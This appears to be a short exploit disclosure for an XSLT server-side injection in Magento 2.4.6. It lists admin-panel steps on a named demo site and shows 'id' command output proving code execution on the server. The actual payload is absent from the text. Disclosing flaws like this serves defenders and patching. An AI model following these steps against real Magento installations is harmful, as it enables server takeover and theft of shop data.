Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection # Date: 2023-11-17 # Exploit Author: tmrswrr # Vendor Homepage: https://magento2demo.firebearstudio.com/ # Software Link: https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip # Version: 2.4.6 # Tested on: 2.4.6 POC: 1 ) Enter with admin creds this url : https://magento2demo.firebearstudio.com/ 2 ) Click SYSTEM > Import Jobs > Entity Type Widget > click edit 3 ) Click XSLT Configuration and write this payload : 4 ) Click Test XSL Template , You will be see "id" command result : uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)